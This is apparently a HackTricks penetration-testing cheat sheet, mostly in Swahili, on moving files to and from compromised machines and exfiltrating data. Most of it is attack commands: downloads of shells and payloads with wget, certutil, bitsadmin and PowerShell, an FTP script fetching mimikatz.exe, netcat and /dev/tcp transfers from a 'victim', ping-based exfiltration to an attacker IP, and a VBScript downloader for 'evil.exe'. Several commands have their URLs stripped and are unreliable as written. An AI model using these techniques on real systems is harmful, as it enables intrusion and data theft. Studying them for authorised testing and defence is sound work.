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Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Kujitahidi Kwa Bidii

{% embed url="https://discord.gg/tryhardsecurity" %}

Vyanzo vya kawaida vilivyoorodheshwa kwa ajili ya kufyonza taarifa

Angalia https://lots-project.com/ kupata vyanzo vya kawaida vilivyoorodheshwa ambavyo vinaweza kutumiwa vibaya

Nakili&Banda la Msingi wa 64


base64 -w0 <file> #Encode file
base64 -d file #Decode file


certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll



wget -O /dev/shm/.rev.py
wget -P /dev/shm
curl -o /dev/shm/shell.py
fetch #FreeBSD


certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

(New-Object Net.WebClient).DownloadFile("","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "" -OutFile "taskkill.exe"
wget "" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Pakia faili

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

Seva ya HTTPS

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)

from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)

from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
def root():
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="", port=8443)


Seva ya FTP (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

Seva ya FTP (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv --root /tmp

Seva ya FTP (pure-ftp)

apt-get update && apt-get install pure-ftp
#Run the following script to configure the FTP server
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Mteja wa Windows

#Work well with python. With pure-ftp use fusr:ftp
echo open 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt


Kali kama server

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

Au unaweza kuunda smb share kwa kutumia samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Exfiltration Techniques on Windows

Exfiltration Over C2 Channels

When exfiltrating data over command and control (C2) channels, an attacker can leverage existing C2 infrastructure to blend in with legitimate traffic. This can include using encrypted channels, steganography, or other obfuscation techniques to avoid detection.

Exfiltration Over Alternative Protocols

Attackers can also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTP. By encoding data within the protocol traffic, an attacker can bypass network security controls that may only be inspecting specific protocols.

Exfiltration Over Trusted Protocols

Utilizing trusted protocols like HTTPS or DNS can help an attacker blend in with normal network traffic. By abusing these protocols to exfiltrate data, an attacker can avoid raising suspicion from security monitoring tools.

Exfiltration Over Encrypted Channels

Encrypting exfiltrated data can help evade detection by security tools that are not able to inspect encrypted traffic. By using encryption, an attacker can make it more challenging for defenders to identify and block exfiltration attempts.

CMD-Wind> \\\path\to\exe
CMD-Wind> net use z: \\\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\\kali"
WindPS-2> cd new_disk:


Mshambuliaji lazima awe na SSHd inayofanya kazi.

scp <username>@<Attacker_IP>:<directory>/<filename>


Ikiwa muathiriwa ana SSH, mkaidi anaweza kufunga saraka kutoka kwa muathiriwa kwenda kwa mkaidi.

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/




Exfiltration is the unauthorized transfer of data from a target. This can be achieved through various methods, such as:

  • Email: Sending sensitive data as email attachments.
  • FTP: Transferring data using File Transfer Protocol.
  • DNS: Sending data through DNS requests.
  • HTTP/HTTPS: Using HTTP or HTTPS protocols to exfiltrate data.
  • Steganography: Hiding data within other files to avoid detection.
  • Physical: Removing data physically from a target location.


Detecting exfiltration can be challenging due to the covert nature of the activity. Some common detection methods include:

  • Network Monitoring: Monitoring network traffic for unusual patterns.
  • Endpoint Monitoring: Monitoring endpoint devices for unauthorized data transfers.
  • Data Loss Prevention (DLP): Using DLP solutions to detect and prevent data exfiltration.
  • Behavioral Analytics: Analyzing user behavior to identify suspicious activities.
  • Encryption: Implementing encryption to protect data from being exfiltrated.


Preventing exfiltration requires a multi-layered approach to security. Some prevention techniques include:

  • Access Control: Limiting access to sensitive data to authorized personnel only.
  • Network Segmentation: Segmenting networks to prevent lateral movement of attackers.
  • User Training: Educating users about the risks of data exfiltration and how to prevent it.
  • Security Policies: Implementing strict security policies to govern data handling practices.
  • Security Tools: Deploying security tools such as firewalls, IDS/IPS, and SIEM solutions to detect and prevent exfiltration attempts.

By understanding exfiltration techniques and implementing appropriate detection and prevention measures, organizations can better protect their data from unauthorized access and transfer.

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file


Pakua faili kutoka kwa muathiriwa

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/ #Inside victim

Pakia faili kwa muathiriwa

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/
cat <&6 > file.txt

Asante kwa @BinaryShadow_


# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)


Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP kupokea data hiyo kwa kutumia python:

sudo python -m smtpd -n -c DebuggingServer :25


Kwa chaguo-msingi katika XP na 2003 (katika mingine inahitaji kuongezwa wazi wakati wa usakinishaji)

Katika Kali, anzisha seva ya TFTP:

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

Server ya TFTP kwa kutumia python:

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

Katika mwendwa, unganisha kwenye seva ya Kali:

tftp -i <KALI-IP> get nc.exe


Pakua faili kwa PHP oneliner:

echo "<?php file_put_contents('nameOfFile', fopen('', 'r')); ?>" > down2.php


VBScript ni lugha ya programu inayotumika sana kwa maendeleo ya skripti za Windows. Inaweza kutumika kwa ufanisi kutekeleza shughuli za uhamishaji wa data kwa njia ya exfiltration.

Attacker> python -m SimpleHTTPServer 80


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs evil.exe


Programu ya debug.exe sio tu inaruhusu ukaguzi wa binaries lakini pia ina uwezo wa kujenga upya kutoka hex. Hii inamaanisha kwamba kwa kutoa hex ya binary, debug.exe inaweza kuzalisha faili ya binary. Hata hivyo, ni muhimu kuzingatia kwamba debug.exe ina kizuizi cha kuunda faili hadi 64 kb in size.

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

Kisha nakili na ushirikishe maudhui kwenye windows-shell na faili inayoitwa nc.exe itaundwa.


Kikundi cha Usalama cha Kujaribu Kwa Bidii

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: